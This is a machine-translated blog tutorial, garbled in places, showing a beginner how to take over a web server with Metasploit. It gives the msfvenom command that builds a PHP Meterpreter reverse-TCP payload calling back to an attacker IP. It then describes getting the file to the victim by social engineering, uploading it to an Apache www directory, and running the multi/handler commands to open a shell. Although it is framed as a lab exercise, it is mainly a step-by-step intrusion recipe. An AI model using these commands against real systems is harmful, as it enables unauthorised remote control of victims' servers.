Yyds dry goods inventory network security, website security and computer security: how does Xiaobai use Kali Linux to obtain the operation authority of web website server [i]

One 、 Background introduction

Metasploit Is a network security framework . Its full name is The Metasploit Framework, It's called MSF.Metasploit As the most popular tool in the world , Not just because it's convenient and powerful , What's more, its framework . It allows users to develop their own scripts , To test .Metasploit(msf) How powerful it is ？ How to use the wood code to control the victim's host ？ Now let's learn ！​

Two 、 Resources and equipment

1. Install well Win7 A virtual machine of

2. Xiaobai, who is ready to go .

3. Installed Kali Linux One virtual machine .

3、 ... and 、 Safety drill

3.1 Send the victim to the host （Windows7） With the controller host （Kali Linux） All network modes are set to NAT Pattern , As shown in the figure below .

step ： Open the virtual machine settings / Choose a network adapter / choice NAT Pattern .

3.2 Check the of the two hosts in the experiment IP Address , As shown in the figure below .

command ：ifconfig

3.3 utilize “msfvenom” The wood code generation tool generates the corresponding wood code file , As shown in the figure below .

step 1：msfvenom Introduction to the parameters of the tool

-p, –payload < payload> Specify the payload load . You can also use custom payload, It supports almost all platforms

-o, –out < path> Specify the created payload Storage location of .

-h, –help See help options .

step 2： utilize msfvenom The tool generates the corresponding wood code file , As shown in the figure below .

command ：msfvenom -p Specify the payload load lhost= Controller host IP -f exe > Save location of the generated wood code file

Example ：msfVenom -p php/meterpreter/reverse_tcp lhost=192.168.78.168 lport=4444 -r raw > /root/hack.php

step 3： Find out whether the corresponding wood code file has been generated under the directory of the known wood code file saving path , As shown in the figure below , The wood code file already exists （ Here, a graphical file management system is used to view , You can also use ls Command to check whether the corresponding wood code file has been generated under the corresponding path ）.

3.4 Using certain social engineering methods, the generated wood code file is sent to the target victim host , And run on the victim's host （ For the corresponding social engineering knowledge, please continue to pay attention to this number , Follow up explanation ）, As shown in the figure below .

3.5 install “phpstudy Integrated environment ”, As shown in the figure below .

step 1： open “phpstudy” Choose the software version corresponding to your computer system on the official website to download .

step 2： Installation precautions

1. The installation path cannot contain “ chinese ” perhaps “ Space ”, Otherwise, an error will be reported （ For example, error prompts ：Can't change dir to 'G:\\x65b0\x5efa\x6587\）

2. Make sure the installation path is clean , You cannot have installed in the installation path V8 edition , If you reinstall , Please choose another path

step 3：phpstudy Official tutorial , Take it by yourself .

website ：https://www.php.cn/course/1066.html

3.6 After installing the corresponding software , start-up phpstudy Environment in , As shown in the figure below .

step 1： Click the start button next to the corresponding environment to start .

 

step 2： Get into apache service , As shown in the figure below .

3.7 Upload the corresponding wood code file to apache Service www Under the table of contents , As shown in the figure below .

3.8 start-up Metasploit（msf） frame , As shown in the figure below .

command 1：msfconsole

 

command 2：use exploit/multi/handler

command 3：set payload php/meterpreter/reverse_tcp

command 4：show options

command 5：set lhost 192.168.78.168

command 6：run（ Boot module ）

3.9 Get the of the target host server shell, As shown in the figure below .

command ：shell Get into shell page .

​ ​ Point to my major Kali Linux Safety technology ​​